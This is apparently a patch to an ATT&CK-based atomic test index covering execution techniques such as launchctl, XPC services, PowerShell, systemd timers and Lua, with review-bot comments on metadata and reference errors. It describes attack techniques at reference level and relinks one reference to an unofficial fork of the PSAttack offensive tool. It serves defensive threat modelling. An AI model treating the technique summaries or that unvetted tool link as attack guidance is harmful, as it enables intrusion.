@@ -30631,14 +30942,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -30704,39 +31012,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -30745,6 +31027,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -30757,19 +31040,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
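Review bot: `x_mitre_permissions_required:` with `- User` and `- root` is removed from T1569.001 with nothing replacing it, while `x_mitre_remote_support: false` is added in the same spot; the privilege-level signal is gone for any consumer that filters on it. T1559 loses the same key later in the patch, so this is presumably tracking the upstream field removal, but the commit message should say so.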
@@ -30812,7 +31118,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
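Review bot: `modified` for T1059.008 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`, and the object's `x_mitre_attack_spec_version: 2.1.0` is left at the old value while its neighbours go to 3.2.0; that pattern suggests this object was regenerated from an older STIX bundle than the rest of the patch. Check the source bundle before merging; T1204.003 shows the same backwards move further down.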
@@ -30828,72 +31134,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
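Review bot: typo in the new T1204 bullet `+ * Coerceing users to copy, paste, and execute malicious code manually`, which should read "Coercing"; if the description is copied verbatim from upstream ATT&CK the fix belongs there too, but the index should not carry it. Separately, the T1559.003 description in this hunk keeps bare line breaks after `C API` and `NSXPCConnection API` in both the removed and added text; those are stripped `<code>` tags from the source HTML, so they will land as literal newlines inside the `|-` block and are worth cleaning in the generator rather than by hand.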
@@ -30901,7 +31210,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -30916,7 +31229,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -30943,6 +31256,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
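Review bot: the new reference author is written `Reliaquest.` while the contributor added to T1204 in this same patch is `ReliaQuest`; use one spelling in both places (the vendor writes ReliaQuest).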
@@ -30953,15 +31270,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -30978,7 +31299,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -31026,7 +31347,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -31059,12 +31380,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -31125,8 +31445,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
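Review bot: the `Github PSAttack` reference now points at `https://github.com/Exploit-install/PSAttack-1` instead of the author's own `https://github.com/jaredhaight/PSAttack`; that is a third-party copy of an offensive tool, not the canonical repository, and nothing in the hunk says the original is gone. Verify the original URL before replacing it, and if it really has been removed prefer a Web Archive snapshot of the author's repo over an unofficial fork, so readers are not steered to code nobody in the project has vetted.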
@@ -31148,12 +31469,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -31231,9 +31551,8 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -31349,7 +31668,7 @@ execution:
name: sh
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -31407,7 +31726,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests:
- name: Create and Execute Bash Shell Script
@@ -31783,31 +32101,7 @@ execution:
elevation_required: true
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -31828,25 +32122,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
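Review bot: the new `T1059.011:` entry ends with `x_mitre_modified_by_ref: ...` followed directly by `atomic_tests: []`, with no `identifier: T1059.011` line, whereas the T1559 entry just above it carries `identifier: T1559` before its `atomic_tests: []`; decide whether `identifier` is required and either add it here or drop it consistently. Two smaller things in the same block: the Sunseed reference author string ends in `Team..` (double period), and the Lua description carries the same stripped inline-code line breaks after `(.lua` and `struct lua_State` as the T1559.003 text earlier in the patch.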
@@ -31875,7 +32254,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -31902,30 +32281,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
